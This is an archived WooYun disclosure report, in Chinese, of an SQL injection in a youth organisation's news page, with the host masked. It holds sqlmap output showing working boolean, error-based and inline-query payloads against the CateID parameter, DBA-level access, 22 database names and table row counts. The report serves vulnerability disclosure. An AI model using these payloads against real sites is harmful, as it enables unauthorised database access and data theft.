乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-17: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
注入点:http://**.**.**.**/tnyouth/news_detail.asp?CateID=1&NewsID=29027很多数据库,并且是DBA权限!
sqlmap resumed the following injection point(s) from stored session:---Parameter: CateID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: CateID=1 AND 2142=2142&NewsID=29027 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: CateID=1 AND 2680=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2680=2680) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)))&NewsID=29027 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: CateID=(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1702=1702) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113))&NewsID=29027---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008current database: 'E5912429_ego'current user is DBA: Trueavailable databases [22]:[*] BCST[*] E5912429_ego[*] E5912429_pain[*] FourSeason[*] KD[*] LD[*] liposome[*] master[*] model[*] msdb[*] ntusm[*] Oral99[*] PenMen[*] People[*] PeopleMove[*] PeopleMove2013[*] PPAT2010[*] Register[*] screening[*] screening99[*] tempdb[*] vhost64494
22个数据库
Database: E5912429_ego+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.tb_news | 28954 || dbo.tb_newsBackup | 12202 || dbo.tb_uploadfile | 2988 || dbo.tb_youthDB | 2819 || dbo.tb_registration | 1324 || dbo.tb_match_youth | 718 || dbo.tb_match | 408 || dbo.tb_request | 365 || dbo.tb_symposium | 138 || dbo.tb_feedback | 68 || dbo.tb_heart | 24 || dbo.tb_ads | 20 || dbo.tb_admin | 12 || dbo.tb_radio | 10 || dbo.tb_youth | 9 || dbo.tb_doc | 6 || dbo.tb_email | 5 || dbo.tb_welcome | 3 || dbo.tb_activity | 2 || dbo.tb_activity_cate | 2 || dbo.tb_image | 2 || dbo.tb_pagedown | 1 |+----------------------+---------+
危害等级:高
漏洞Rank:18
确认时间:2015-12-18 21:50
感謝通報
暂无